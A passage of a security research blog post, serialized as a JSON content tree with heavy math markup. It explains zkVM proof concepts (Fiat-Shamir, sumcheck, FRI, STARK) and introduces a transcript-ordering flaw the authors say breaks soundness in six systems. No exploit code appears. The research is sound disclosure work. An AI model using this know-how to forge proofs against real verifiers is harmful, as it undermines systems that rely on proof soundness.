property: evaluating it is a linear function of the table entries.",{"type":24,"tag":2659,"props":114668,"children":114669},{},[114670,114675],{"type":24,"tag":60,"props":114671,"children":114672},{},[114673],{"type":30,"value":114674},"Lookup / LogUp",{"type":30,"value":114676},": Prove \"all my values appear in this table\" by encoding membership as sums of fractions. If the sums match, the sets match (with high probability).",{"type":24,"tag":2659,"props":114678,"children":114679},{},[114680,114685],{"type":24,"tag":60,"props":114681,"children":114682},{},[114683],{"type":30,"value":114684},"AIR",{"type":30,"value":114686},": \"Algebraic Intermediate Representation\" - a way to write \"valid execution trace\" as polynomial equations. If the equations hold, the trace is valid.",{"type":24,"tag":2659,"props":114688,"children":114689},{},[114690,114695],{"type":24,"tag":60,"props":114691,"children":114692},{},[114693],{"type":30,"value":114694},"STARK",{"type":30,"value":114696},": Prove AIR constraints hold using commitments + random sampling + FRI. No trusted setup needed.",{"type":24,"tag":2659,"props":114698,"children":114699},{},[114700,114705],{"type":24,"tag":60,"props":114701,"children":114702},{},[114703],{"type":30,"value":114704},"FRI",{"type":30,"value":114706},": \"Fast Reed-Solomon IOP\" - proves a committed function is actually a low-degree polynomial, not arbitrary garbage that passes spot-checks.",{"type":24,"tag":2659,"props":114708,"children":114709},{},[114710,114715],{"type":24,"tag":60,"props":114711,"children":114712},{},[114713],{"type":30,"value":114714},"OODS",{"type":30,"value":114716},": \"Out-of-Domain Sampling\" - check the constraint polynomial at a random point outside the execution domain. Ties everything together.",{"type":24,"tag":2659,"props":114718,"children":114719},{},[114720,114725],{"type":24,"tag":60,"props":114721,"children":114722},{},[114723],{"type":30,"value":114724},"GKR",{"type":30,"value":114726},": Verify arithmetic circuits layer-by-layer using sumcheck. Reduces \"check this huge circuit\" to \"check a few random evaluations.\"",{"type":24,"tag":2659,"props":114728,"children":114729},{},[114730,114735,114737],{"type":24,"tag":60,"props":114731,"children":114732},{},[114733],{"type":30,"value":114734},"claimed_sum / opening_claim",{"type":30,"value":114736},": Prover-supplied values that feed into verification equations. ",{"type":24,"tag":60,"props":114738,"children":114739},{},[114740],{"type":30,"value":114741},"These are the usual suspects for binding bugs.",{"type":24,"tag":2719,"props":114743,"children":114744},{},[],{"type":24,"tag":43,"props":114746,"children":114748},{"id":114747},"what-are-we-even-breaking",[114749],{"type":30,"value":114750},"What Are We Even Breaking?",{"type":24,"tag":80,"props":114752,"children":114754},{"id":114753},"what-is-a-zkvm",[114755],{"type":30,"value":114756},"What is a zkVM?",{"type":24,"tag":32,"props":114758,"children":114759},{},[114760],{"type":30,"value":114761},"A zkVM proof claims that a program executed correctly on public inputs, producing the claimed public output, while hiding the full execution trace.",{"type":24,"tag":32,"props":114763,"children":114764},{},[114765,114767,114792],{"type":30,"value":114766},"Formally, the verifier is convinced that there exists a valid trace ",{"type":24,"tag":145,"props":114768,"children":114770},{"className":114769},[10807,10808],[114771],{"type":24,"tag":301,"props":114772,"children":114774},{"className":114773},[10813],[114775],{"type":24,"tag":301,"props":114776,"children":114778},{"className":114777,"ariaHidden":10819},[10818],[114779],{"type":24,"tag":301,"props":114780,"children":114782},{"className":114781},[10824],[114783,114787],{"type":24,"tag":301,"props":114784,"children":114786},{"className":114785,"style":28352},[10829],[],{"type":24,"tag":301,"props":114788,"children":114790},{"className":114789,"style":28358},[10835,28357],[114791],{"type":30,"value":12807},{"type":30,"value":114793}," such that:",{"type":24,"tag":32,"props":114795,"children":114796},{},[114797],{"type":24,"tag":145,"props":114798,"children":114800},{"className":114799},[10807,10808],[114801],{"type":24,"tag":301,"props":114802,"children":114804},{"className":114803},[10813],[114805],{"type":24,"tag":301,"props":114806,"children":114808},{"className":114807,"ariaHidden":10819},[10818],[114809,114853,114928],{"type":24,"tag":301,"props":114810,"children":114812},{"className":114811},[10824],[114813,114817,114823,114827,114832,114836,114840,114845,114849],{"type":24,"tag":301,"props":114814,"children":114816},{"className":114815,"style":99660},[10829],[],{"type":24,"tag":301,"props":114818,"children":114820},{"className":114819},[10835],[114821],{"type":30,"value":114822},"∃",{"type":24,"tag":301,"props":114824,"children":114826},{"className":114825,"style":11012},[10914],[],{"type":24,"tag":301,"props":114828,"children":114830},{"className":114829,"style":28358},[10835,28357],[114831],{"type":30,"value":12807},{"type":24,"tag":301,"props":114833,"children":114835},{"className":114834,"style":11012},[10914],[],{"type":24,"tag":301,"props":114837,"children":114839},{"className":114838,"style":11012},[10914],[],{"type":24,"tag":301,"props":114841,"children":114843},{"className":114842},[11017],[114844],{"type":30,"value":1679},{"type":24,"tag":301,"props":114846,"children":114848},{"className":114847,"style":11012},[10914],[],{"type":24,"tag":301,"props":114850,"children":114852},{"className":114851,"style":11012},[10914],[],{"type":24,"tag":301,"props":114854,"children":114856},{"className":114855},[10824],[114857,114861,114872,114877,114882,114887,114891,114896,114901,114905,114910,114915,114919,114924],{"type":24,"tag":301,"props":114858,"children":114860},{"className":114859,"style":10935},[10829],[],{"type":24,"tag":301,"props":114862,"children":114864},{"className":114863},[10835],[114865],{"type":24,"tag":301,"props":114866,"children":114869},{"className":114867},[10835,114868],"mathsf",[114870],{"type":30,"value":114871},"VM",{"type":24,"tag":301,"props":114873,"children":114875},{"className":114874},[28486],[114876],{"type":30,"value":362},{"type":24,"tag":301,"props":114878,"children":114880},{"className":114879,"style":28358},[10835,28357],[114881],{"type":30,"value":28361},{"type":24,"tag":301,"props":114883,"children":114885},{"className":114884},[10946],[114886],{"type":30,"value":10949},{"type":24,"tag":301,"props":114888,"children":114890},{"className":114889,"style":10953},[10914],[],{"type":24,"tag":301,"props":114892,"children":114894},{"className":114893,"style":101764},[10835,28357],[114895],{"type":30,"value":12952},{"type":24,"tag":301,"props":114897,"children":114899},{"className":114898},[10946],[114900],{"type":30,"value":10949},{"type":24,"tag":301,"props":114902,"children":114904},{"className":114903,"style":10953},[10914],[],{"type":24,"tag":301,"props":114906,"children":114908},{"className":114907,"style":28358},[10835,28357],[114909],{"type":30,"value":12807},{"type":24,"tag":301,"props":114911,"children":114913},{"className":114912},[28508],[114914],{"type":30,"value":9961},{"type":24,"tag":301,"props":114916,"children":114918},{"className":114917,"style":11012},[10914],[],{"type":24,"tag":301,"props":114920,"children":114922},{"className":114921},[11017],[114923],{"type":30,"value":29103},{"type":24,"tag":301,"props":114925,"children":114927},{"className":114926,"style":11012},[10914],[],{"type":24,"tag":301,"props":114929,"children":114931},{"className":114930},[10824],[114932,114936],{"type":24,"tag":301,"props":114933,"children":114935},{"className":114934,"style":28352},[10829],[],{"type":24,"tag":301,"props":114937,"children":114940},{"className":114938,"style":114939},[10835,28357],"margin-right:0.22222em;",[114941],{"type":30,"value":12982},{"type":24,"tag":32,"props":114943,"children":114944},{},[114945],{"type":30,"value":114946},"where:",{"type":24,"tag":2655,"props":114948,"children":114949},{},[114950,114980,115010,115040],{"type":24,"tag":2659,"props":114951,"children":114952},{},[114953,114978],{"type":24,"tag":145,"props":114954,"children":114956},{"className":114955},[10807,10808],[114957],{"type":24,"tag":301,"props":114958,"children":114960},{"className":114959},[10813],[114961],{"type":24,"tag":301,"props":114962,"children":114964},{"className":114963,"ariaHidden":10819},[10818],[114965],{"type":24,"tag":301,"props":114966,"children":114968},{"className":114967},[10824],[114969,114973],{"type":24,"tag":301,"props":114970,"children":114972},{"className":114971,"style":28352},[10829],[],{"type":24,"tag":301,"props":114974,"children":114976},{"className":114975,"style":28358},[10835,28357],[114977],{"type":30,"value":28361},{"type":30,"value":114979}," = program/circuit description (public)",{"type":24,"tag":2659,"props":114981,"children":114982},{},[114983,115008],{"type":24,"tag":145,"props":114984,"children":114986},{"className":114985},[10807,10808],[114987],{"type":24,"tag":301,"props":114988,"children":114990},{"className":114989},[10813],[114991],{"type":24,"tag":301,"props":114992,"children":114994},{"className":114993,"ariaHidden":10819},[10818],[114995],{"type":24,"tag":301,"props":114996,"children":114998},{"className":114997},[10824],[114999,115003],{"type":24,"tag":301,"props":115000,"children":115002},{"className":115001,"style":28352},[10829],[],{"type":24,"tag":301,"props":115004,"children":115006},{"className":115005,"style":101764},[10835,28357],[115007],{"type":30,"value":12952},{"type":30,"value":115009}," = public input",{"type":24,"tag":2659,"props":115011,"children":115012},{},[115013,115038],{"type":24,"tag":145,"props":115014,"children":115016},{"className":115015},[10807,10808],[115017],{"type":24,"tag":301,"props":115018,"children":115020},{"className":115019},[10813],[115021],{"type":24,"tag":301,"props":115022,"children":115024},{"className":115023,"ariaHidden":10819},[10818],[115025],{"type":24,"tag":301,"props":115026,"children":115028},{"className":115027},[10824],[115029,115033],{"type":24,"tag":301,"props":115030,"children":115032},{"className":115031,"style":28352},[10829],[],{"type":24,"tag":301,"props":115034,"children":115036},{"className":115035,"style":114939},[10835,28357],[115037],{"type":30,"value":12982},{"type":30,"value":115039}," = claimed public output",{"type":24,"tag":2659,"props":115041,"children":115042},{},[115043,115068],{"type":24,"tag":145,"props":115044,"children":115046},{"className":115045},[10807,10808],[115047],{"type":24,"tag":301,"props":115048,"children":115050},{"className":115049},[10813],[115051],{"type":24,"tag":301,"props":115052,"children":115054},{"className":115053,"ariaHidden":10819},[10818],[115055],{"type":24,"tag":301,"props":115056,"children":115058},{"className":115057},[10824],[115059,115063],{"type":24,"tag":301,"props":115060,"children":115062},{"className":115061,"style":28352},[10829],[],{"type":24,"tag":301,"props":115064,"children":115066},{"className":115065,"style":28358},[10835,28357],[115067],{"type":30,"value":12807},{"type":30,"value":115069}," = private witness/trace (registers, memory history, intermediate values)",{"type":24,"tag":32,"props":115071,"children":115072},{},[115073,115075,115079],{"type":30,"value":115074},"The verifier does ",{"type":24,"tag":60,"props":115076,"children":115077},{},[115078],{"type":30,"value":25267},{"type":30,"value":115080}," replay execution step by step. Instead, it checks algebraic constraints over committed polynomials.",{"type":24,"tag":32,"props":115082,"children":115083},{},[115084,115086,115091],{"type":30,"value":115085},"Some systems in this post are verifiable-computing systems rather than full zero-knowledge systems, but the critical property is still ",{"type":24,"tag":60,"props":115087,"children":115088},{},[115089],{"type":30,"value":115090},"soundness",{"type":30,"value":1679},{"type":24,"tag":2655,"props":115093,"children":115094},{},[115095,115105],{"type":24,"tag":2659,"props":115096,"children":115097},{},[115098,115103],{"type":24,"tag":60,"props":115099,"children":115100},{},[115101],{"type":30,"value":115102},"Completeness",{"type":30,"value":115104},": honest execution verifies.",{"type":24,"tag":2659,"props":115106,"children":115107},{},[115108,115113],{"type":24,"tag":60,"props":115109,"children":115110},{},[115111],{"type":30,"value":115112},"Soundness",{"type":30,"value":115114},": false execution should not verify.",{"type":24,"tag":32,"props":115116,"children":115117},{},[115118,115120,115124],{"type":30,"value":115119},"We are breaking ",{"type":24,"tag":60,"props":115121,"children":115122},{},[115123],{"type":30,"value":115090},{"type":30,"value":115125}," in all six systems.",{"type":24,"tag":32,"props":115127,"children":115128},{},[115129],{"type":30,"value":115130},"In all six codebases, verification follows this abstract flow:",{"type":24,"tag":6246,"props":115132,"children":115133},{},[115134,115139,115144,115149,115154,115159],{"type":24,"tag":2659,"props":115135,"children":115136},{},[115137],{"type":30,"value":115138},"Fix public statement data.",{"type":24,"tag":2659,"props":115140,"children":115141},{},[115142],{"type":30,"value":115143},"Parse proof payload (commitments, reduction messages, openings).",{"type":24,"tag":2659,"props":115145,"children":115146},{},[115147],{"type":30,"value":115148},"Rebuild Fiat-Shamir challenges from transcript state.",{"type":24,"tag":2659,"props":115150,"children":115151},{},[115152],{"type":30,"value":115153},"Check constraint equations at sampled points.",{"type":24,"tag":2659,"props":115155,"children":115156},{},[115157],{"type":30,"value":115158},"Check PCS/opening consistency.",{"type":24,"tag":2659,"props":115160,"children":115161},{},[115162],{"type":30,"value":115163},"Accept only if all checks are jointly consistent.",{"type":24,"tag":32,"props":115165,"children":115166},{},[115167],{"type":24,"tag":177,"props":115168,"children":115171},{"alt":115169,"src":115170},"1_prover_verifier","/posts/zkvms-unfaithful-claims/1_prover_verifier.svg",[],{"type":24,"tag":32,"props":115173,"children":115174},{},[115175],{"type":30,"value":115176},"The non-negotiable invariant is transcript ordering: if a value affects a verifier equation, it must be absorbed before sampling the challenge that gates that equation. Violating this gives the prover an attacker-controlled degree of freedom.",{"type":24,"tag":2719,"props":115178,"children":115179},{},[],{"type":24,"tag":43,"props":115181,"children":115183},{"id":115182},"the-building-blocks",[115184],{"type":30,"value":115185},"The Building Blocks",{"type":24,"tag":32,"props":115187,"children":115188},{},[115189],{"type":30,"value":115190},"Before we can understand the bugs, we need to understand the protocols they break. Each of these is a tool that zkVMs compose together.",{"type":24,"tag":80,"props":115192,"children":115194},{"id":115193},"the-fiat-shamir-transform",[115195],{"type":30,"value":115196},"The Fiat-Shamir Transform",{"type":24,"tag":32,"props":115198,"children":115199},{},[115200],{"type":30,"value":115201},"Interactive protocols (the type most commonly described in literature) require real-time communication. It involves the verifier sending random challenges, and the prover responding to them. This doesn't work for blockchains (where you have no real-time verifier) or when you want anyone to verify your proof at a later point.",{"type":24,"tag":32,"props":115203,"children":115204},{},[115205],{"type":30,"value":115206},"The solution is to replace the verifier's randomness with a hash function. The prover \"talks to themselves,\" using the hash of everything so far as the challenge. If we use a cryptographic hash function, this should mean that the challenges are completely unpredictable.",{"type":24,"tag":32,"props":115208,"children":115209},{},[115210],{"type":24,"tag":177,"props":115211,"children":115214},{"alt":115212,"src":115213},"fiat_shamir2","/posts/zkvms-unfaithful-claims/fiat_shamir2.svg",[],{"type":24,"tag":32,"props":115216,"children":115217},{},[115218,115220,115224,115226,115231],{"type":30,"value":115219},"The hash (transcript) ",{"type":24,"tag":60,"props":115221,"children":115222},{},[115223],{"type":30,"value":13338},{"type":30,"value":115225}," include everything that affects verification ",{"type":24,"tag":60,"props":115227,"children":115228},{},[115229],{"type":30,"value":115230},"BEFORE",{"type":30,"value":115232}," the challenges derived from it are used.",{"type":24,"tag":32,"props":115234,"children":115235},{},[115236,115238,115264,115266,115291,115293,115318,115320,115345,115347,115372],{"type":30,"value":115237},"If some value ",{"type":24,"tag":145,"props":115239,"children":115241},{"className":115240},[10807,10808],[115242],{"type":24,"tag":301,"props":115243,"children":115245},{"className":115244},[10813],[115246],{"type":24,"tag":301,"props":115247,"children":115249},{"className":115248,"ariaHidden":10819},[10818],[115250],{"type":24,"tag":301,"props":115251,"children":115253},{"className":115252},[10824],[115254,115258],{"type":24,"tag":301,"props":115255,"children":115257},{"className":115256,"style":28352},[10829],[],{"type":24,"tag":301,"props":115259,"children":115261},{"className":115260,"style":114939},[10835,28357],[115262],{"type":30,"value":115263},"V",{"type":30,"value":115265}," affects a verification equation, but ",{"type":24,"tag":145,"props":115267,"children":115269},{"className":115268},[10807,10808],[115270],{"type":24,"tag":301,"props":115271,"children":115273},{"className":115272},[10813],[115274],{"type":24,"tag":301,"props":115275,"children":115277},{"className":115276,"ariaHidden":10819},[10818],[115278],{"type":24,"tag":301,"props":115279,"children":115281},{"className":115280},[10824],[115282,115286],{"type":24,"tag":301,"props":115283,"children":115285},{"className":115284,"style":28352},[10829],[],{"type":24,"tag":301,"props":115287,"children":115289},{"className":115288,"style":114939},[10835,28357],[115290],{"type":30,"value":115263},{"type":30,"value":115292}," isn't absorbed before the relevant challenge is squeezed, then the challenge is completely independent of ",{"type":24,"tag":145,"props":115294,"children":115296},{"className":115295},[10807,10808],[115297],{"type":24,"tag":301,"props":115298,"children":115300},{"className":115299},[10813],[115301],{"type":24,"tag":301,"props":115302,"children":115304},{"className":115303,"ariaHidden":10819},[10818],[115305],{"type":24,"tag":301,"props":115306,"children":115308},{"className":115307},[10824],[115309,115313],{"type":24,"tag":301,"props":115310,"children":115312},{"className":115311,"style":28352},[10829],[],{"type":24,"tag":301,"props":115314,"children":115316},{"className":115315,"style":114939},[10835,28357],[115317],{"type":30,"value":115263},{"type":30,"value":115319},". This means that the prover can \"see\" (compute in advance) the challenge before choosing ",{"type":24,"tag":145,"props":115321,"children":115323},{"className":115322},[10807,10808],[115324],{"type":24,"tag":301,"props":115325,"children":115327},{"className":115326},[10813],[115328],{"type":24,"tag":301,"props":115329,"children":115331},{"className":115330,"ariaHidden":10819},[10818],[115332],{"type":24,"tag":301,"props":115333,"children":115335},{"className":115334},[10824],[115336,115340],{"type":24,"tag":301,"props":115337,"children":115339},{"className":115338,"style":28352},[10829],[],{"type":24,"tag":301,"props":115341,"children":115343},{"className":115342,"style":114939},[10835,28357],[115344],{"type":30,"value":115263},{"type":30,"value":115346},", which may allow it to choose ",{"type":24,"tag":145,"props":115348,"children":115350},{"className":115349},[10807,10808],[115351],{"type":24,"tag":301,"props":115352,"children":115354},{"className":115353},[10813],[115355],{"type":24,"tag":301,"props":115356,"children":115358},{"className":115357,"ariaHidden":10819},[10818],[115359],{"type":24,"tag":301,"props":115360,"children":115362},{"className":115361},[10824],[115363,115367],{"type":24,"tag":301,"props":115364,"children":115366},{"className":115365,"style":28352},[10829],[],{"type":24,"tag":301,"props":115368,"children":115370},{"className":115369,"style":114939},[10835,28357],[115371],{"type":30,"value":115263},{"type":30,"value":115373}," exactly so that the verification passes, even though it should not.",{"type":24,"tag":32,"props":115375,"children":115376},{},[115377],{"type":30,"value":115378},"This is the bug class we found in all six systems.",{"type":24,"tag":80,"props":115380,"children":115382},{"id":115381},"the-sumcheck-protocol",[115383],{"type":30,"value":115384},"The Sumcheck Protocol",{"type":24,"tag":32,"props":115386,"children":115387},{},[115388,115390,115476],{"type":30,"value":115389},"The sumcheck protocol proves that a polynomial sums to a claimed value over the Boolean hypercube (all inputs in ",{"type":24,"tag":145,"props":115391,"children":115393},{"className":115392},[10807,10808],[115394],{"type":24,"tag":301,"props":115395,"children":115397},{"className":115396},[10813],[115398],{"type":24,"tag":301,"props":115399,"children":115401},{"className":115400,"ariaHidden":10819},[10818],[115402],{"type":24,"tag":301,"props":115403,"children":115405},{"className":115404},[10824],[115406,115410,115415,115420,115425,115429,115434],{"type":24,"tag":301,"props":115407,"children":115409},{"className":115408,"style":10935},[10829],[],{"type":24,"tag":301,"props":115411,"children":115413},{"className":115412},[28486],[115414],{"type":30,"value":83330},{"type":24,"tag":301,"props":115416,"children":115418},{"className":115417},[10835],[115419],{"type":30,"value":584},{"type":24,"tag":301,"props":115421,"children":115423},{"className":115422},[10946],[115424],{"type":30,"value":10949},{"type":24,"tag":301,"props":115426,"children":115428},{"className":115427,"style":10953},[10914],[],{"type":24,"tag":301,"props":115430,"children":115432},{"className":115431},[10835],[115433],{"type":30,"value":546},{"type":24,"tag":301,"props":115435,"children":115437},{"className":115436},[28508],[115438,115443],{"type":24,"tag":301,"props":115439,"children":115441},{"className":115440},[28508],[115442],{"type":30,"value":40889},{"type":24,"tag":301,"props":115444,"children":115446},{"className":115445},[10850],[115447],{"type":24,"tag":301,"props":115448,"children":115450},{"className":115449},[10855],[115451],{"type":24,"tag":301,"props":115452,"children":115454},{"className":115453},[10860],[115455],{"type":24,"tag":301,"props":115456,"children":115459},{"className":115457,"style":115458},[10865],"height:0.6644em;",[115460],{"type":24,"tag":301,"props":115461,"children":115462},{"style":10869},[115463,115467],{"type":24,"tag":301,"props":115464,"children":115466},{"className":115465,"style":10875},[10874],[],{"type":24,"tag":301,"props":115468,"children":115470},{"className":115469},[10880,10881,10882,10883],[115471],{"type":24,"tag":301,"props":115472,"children":115474},{"className":115473},[10835,28357,10883],[115475],{"type":30,"value":63123},{"type":30,"value":115477},"), i.e the claim:",{"type":24,"tag":32,"props":115479,"children":115480},{},[115481],{"type":24,"tag":145,"props":115482,"children":115484},{"className":115483},[10807,10808],[115485],{"type":24,"tag":301,"props":115486,"children":115488},{"className":115487},[10813],[115489],{"type":24,"tag":301,"props":115490,"children":115492},{"className":115491,"ariaHidden":10819},[10818],[115493,115519],{"type":24,"tag":301,"props":115494,"children":115496},{"className":115495},[10824],[115497,115501,115506,115510,115515],{"type":24,"tag":301,"props":115498,"children":115500},{"className":115499,"style":28352},[10829],[],{"type":24,"tag":301,"props":115502,"children":115504},{"className":115503,"style":99979},[10835,28357],[115505],{"type":30,"value":99982},{"type":24,"tag":301,"props":115507,"children":115509},{"className":115508,"style":11012},[10914],[],{"type":24,"tag":301,"props":115511,"children":115513},{"className":115512},[11017],[115514],{"type":30,"value":523},{"type":24,"tag":301,"props":115516,"children":115518},{"className":115517,"style":11012},[10914],[],{"type":24,"tag":301,"props":115520,"children":115522},{"className":115521},[10824],[115523,115527,115677,115681,115824,115828,115835,115839,115983,115987,115992,115997,116054,116059,116063,116120,116125,116129,116135,116139,116144,116148,116206],{"type":24,"tag":301,"props":115524,"children":115526},{"className":115525,"style":28388},[10829],[],{"type":24,"tag":301,"props":115528,"children":115530},{"className":115529},[28393],[115531,115537],{"type":24,"tag":301,"props":115532,"children":115534},{"className":115533,"style":28400},[28393,28398,28399],[115535],{"type":30,"value":115536},"∑",{"type":24,"tag":301,"props":115538,"children":115540},{"className":115539},[10850],[115541],{"type":24,"tag":301,"props":115542,"children":115544},{"className":115543},[10855,28411],[115545,115666],{"type":24,"tag":301,"props":115546,"children":115548},{"className":115547},[10860],[115549,115661],{"type":24,"tag":301,"props":115550,"children":115552},{"className":115551,"style":28420},[10865],[115553],{"type":24,"tag":301,"props":115554,"children":115555},{"style":28424},[115556,115560],{"type":24,"tag":301,"props":115557,"children":115559},{"className":115558,"style":10875},[10874],[],{"type":24,"tag":301,"props":115561,"children":115563},{"className":115562},[10880,10881,10882,10883],[115564],{"type":24,"tag":301,"props":115565,"children":115567},{"className":115566},[10835,10883],[115568,115631,115636,115641,115646,115651,115656],{"type":24,"tag":301,"props":115569,"children":115571},{"className":115570},[10835,10883],[115572,115577],{"type":24,"tag":301,"props":115573,"children":115575},{"className":115574},[10835,28357,10883],[115576],{"type":30,"value":26050},{"type":24,"tag":301,"props":115578,"children":115580},{"className":115579},[10850],[115581],{"type":24,"tag":301,"props":115582,"children":115584},{"className":115583},[10855,28411],[115585,115619],{"type":24,"tag":301,"props":115586,"children":115588},{"className":115587},[10860],[115589,115614],{"type":24,"tag":301,"props":115590,"children":115593},{"className":115591,"style":115592},[10865],"height:0.3173em;",[115594],{"type":24,"tag":301,"props":115595,"children":115597},{"style":115596},"top:-2.357em;margin-left:0em;margin-right:0.0714em;",[115598,115603],{"type":24,"tag":301,"props":115599,"children":115602},{"className":115600,"style":115601},[10874],"height:2.5em;",[],{"type":24,"tag":301,"props":115604,"children":115608},{"className":115605},[10880,115606,115607,10883],"reset-size3","size1",[115609],{"type":24,"tag":301,"props":115610,"children":115612},{"className":115611},[10835,10883],[115613],{"type":30,"value":546},{"type":24,"tag":301,"props":115615,"children":115617},{"className":115616},[28514],[115618],{"type":30,"value":28517},{"type":24,"tag":301,"props":115620,"children":115622},{"className":115621},[10860],[115623],{"type":24,"tag":301,"props":115624,"children":115627},{"className":115625,"style":115626},[10865],"height:0.143em;",[115628],{"type":24,"tag":301,"props":115629,"children":115630},{},[],{"type":24,"tag":301,"props":115632,"children":115634},{"className":115633},[11017,10883],[115635],{"type":30,"value":28464},{"type":24,"tag":301,"props":115637,"children":115639},{"className":115638},[28486,10883],[115640],{"type":30,"value":83330},{"type":24,"tag":301,"props":115642,"children":115644},{"className":115643},[10835,10883],[115645],{"type":30,"value":584},{"type":24,"tag":301,"props":115647,"children":115649},{"className":115648},[10946,10883],[115650],{"type":30,"value":10949},{"type":24,"tag":301,"props":115652,"children":115654},{"className":115653},[10835,10883],[115655],{"type":30,"value":546},{"type":24,"tag":301,"props":115657,"children":115659},{"className":115658},[28508,10883],[115660],{"type":30,"value":40889},{"type":24,"tag":301,"props":115662,"children":115664},{"className":115663},[28514],[115665],{"type":30,"value":28517},{"type":24,"tag":301,"props":115667,"children":115669},{"className":115668},[10860],[115670],{"type":24,"tag":301,"props":115671,"children":115673},{"className":115672,"style":28525},[10865],[115674],{"type":24,"tag":301,"props":115675,"children":115676},{},[],{"type":24,"tag":301,"props":115678,"children":115680},{"className":115679,"style":10953},[10914],[],{"type":24,"tag":301,"props":115682,"children":115684},{"className":115683},[28393],[115685,115690],{"type":24,"tag":301,"props":115686,"children":115688},{"className":115687,"style":28400},[28393,28398,28399],[115689],{"type":30,"value":115536},{"type":24,"tag":301,"props":115691,"children":115693},{"className":115692},[10850],[115694],{"type":24,"tag":301,"props":115695,"children":115697},{"className":115696},[10855,28411],[115698,115813],{"type":24,"tag":301,"props":115699,"children":115701},{"className":115700},[10860],[115702,115808],{"type":24,"tag":301,"props":115703,"children":115705},{"className":115704,"style":28420},[10865],[115706],{"type":24,"tag":301,"props":115707,"children":115708},{"style":28424},[115709,115713],{"type":24,"tag":301,"props":115710,"children":115712},{"className":115711,"style":10875},[10874],[],{"type":24,"tag":301,"props":115714,"children":115716},{"className":115715},[10880,10881,10882,10883],[115717],{"type":24,"tag":301,"props":115718,"children":115720},{"className":115719},[10835,10883],[115721,115778,115783,115788,115793,115798,115803],{"type":24,"tag":301,"props":115722,"children":115724},{"className":115723},[10835,10883],[115725,115730],{"type":24,"tag":301,"props":115726,"children":115728},{"className":115727},[10835,28357,10883],[115729],{"type":30,"value":26050},{"type":24,"tag":301,"props":115731,"children":115733},{"className":115732},[10850],[115734],{"type":24,"tag":301,"props":115735,"children":115737},{"className":115736},[10855,28411],[115738,115767],{"type":24,"tag":301,"props":115739,"children":115741},{"className":115740},[10860],[115742,115762],{"type":24,"tag":301,"props":115743,"children":115745},{"className":115744,"style":115592},[10865],[115746],{"type":24,"tag":301,"props":115747,"children":115748},{"style":115596},[115749,115753],{"type":24,"tag":301,"props":115750,"children":115752},{"className":115751,"style":115601},[10874],[],{"type":24,"tag":301,"props":115754,"children":115756},{"className":115755},[10880,115606,115607,10883],[115757],{"type":24,"tag":301,"props":115758,"children":115760},{"className":115759},[10835,10883],[115761],{"type":30,"value":1503},{"type":24,"tag":301,"props":115763,"children":115765},{"className":115764},[28514],[115766],{"type":30,"value":28517},{"type":24,"tag":301,"props":115768,"children":115770},{"className":115769},[10860],[115771],{"type":24,"tag":301,"props":115772,"children":115774},{"className":115773,"style":115626},[10865],[115775],{"type":24,"tag":301,"props":115776,"children":115777},{},[],{"type":24,"tag":301,"props":115779,"children":115781},{"className":115780},[11017,10883],[115782],{"type":30,"value":28464},{"type":24,"tag":301,"props":115784,"children":115786},{"className":115785},[28486,10883],[115787],{"type":30,"value":83330},{"type":24,"tag":301,"props":115789,"children":115791},{"className":115790},[10835,10883],[115792],{"type":30,"value":584},{"type":24,"tag":301,"props":115794,"children":115796},{"className":115795},[10946,10883],[115797],{"type":30,"value":10949},{"type":24,"tag":301,"props":115799,"children":115801},{"className":115800},[10835,10883],[115802],{"type":30,"value":546},{"type":24,"tag":301,"props":115804,"children":115806},{"className":115805},[28508,10883],[115807],{"type":30,"value":40889},{"type":24,"tag":301,"props":115809,"children":115811},{"className":115810},[28514],[115812],{"type":30,"value":28517},{"type":24,"tag":301,"props":115814,"children":115816},{"className":115815},[10860],[115817],{"type":24,"tag":301,"props":115818,"children":115820},{"className":115819,"style":28525},[10865],[115821],{"type":24,"tag":301,"props":115822,"children":115823},{},[],{"type":24,"tag":301,"props":115825,"children":115827},{"className":115826,"style":10953},[10914],[],{"type":24,"tag":301,"props":115829,"children":115832},{"className":115830},[115831],"minner",[115833],{"type":30,"value":115834},"⋯",{"type":24,"tag":301,"props":115836,"children":115838},{"className":115837,"style":10953},[10914],[],{"type":24,"tag":301,"props":115840,"children":115842},{"className":115841},[28393],[115843,115848],{"type":24,"tag":301,"props":115844,"children":115846},{"className":115845,"style":28400},[28393,28398,28399],[115847],{"type":30,"value":115536},{"type":24,"tag":301,"props":115849,"children":115851},{"className":115850},[10850],[115852],{"type":24,"tag":301,"props":115853,"children":115855},{"className":115854},[10855,28411],[115856,115972],{"type":24,"tag":301,"props":115857,"children":115859},{"className":115858},[10860],[115860,115967],{"type":24,"tag":301,"props":115861,"children":115863},{"className":115862,"style":28420},[10865],[115864],{"type":24,"tag":301,"props":115865,"children":115866},{"style":28424},[115867,115871],{"type":24,"tag":301,"props":115868,"children":115870},{"className":115869,"style":10875},[10874],[],{"type":24,"tag":301,"props":115872,"children":115874},{"className":115873},[10880,10881,10882,10883],[115875],{"type":24,"tag":301,"props":115876,"children":115878},{"className":115877},[10835,10883],[115879,115937,115942,115947,115952,115957,115962],{"type":24,"tag":301,"props":115880,"children":115882},{"className":115881},[10835,10883],[115883,115888],{"type":24,"tag":301,"props":115884,"children":115886},{"className":115885},[10835,28357,10883],[115887],{"type":30,"value":26050},{"type":24,"tag":301,"props":115889,"children":115891},{"className":115890},[10850],[115892],{"type":24,"tag":301,"props":115893,"children":115895},{"className":115894},[10855,28411],[115896,115926],{"type":24,"tag":301,"props":115897,"children":115899},{"className":115898},[10860],[115900,115921],{"type":24,"tag":301,"props":115901,"children":115904},{"className":115902,"style":115903},[10865],"height:0.1645em;",[115905],{"type":24,"tag":301,"props":115906,"children":115907},{"style":115596},[115908,115912],{"type":24,"tag":301,"props":115909,"children":115911},{"className":115910,"style":115601},[10874],[],{"type":24,"tag":301,"props":115913,"children":115915},{"className":115914},[10880,115606,115607,10883],[115916],{"type":24,"tag":301,"props":115917,"children":115919},{"className":115918},[10835,28357,10883],[115920],{"type":30,"value":63123},{"type":24,"tag":301,"props":115922,"children":115924},{"className":115923},[28514],[115925],{"type":30,"value":28517},{"type":24,"tag":301,"props":115927,"children":115929},{"className":115928},[10860],[115930],{"type":24,"tag":301,"props":115931,"children":115933},{"className":115932,"style":115626},[10865],[115934],{"type":24,"tag":301,"props":115935,"children":115936},{},[],{"type":24,"tag":301,"props":115938,"children":115940},{"className":115939},[11017,10883],[115941],{"type":30,"value":28464},{"type":24,"tag":301,"props":115943,"children":115945},{"className":115944},[28486,10883],[115946],{"type":30,"value":83330},{"type":24,"tag":301,"props":115948,"children":115950},{"className":115949},[10835,10883],[115951],{"type":30,"value":584},{"type":24,"tag"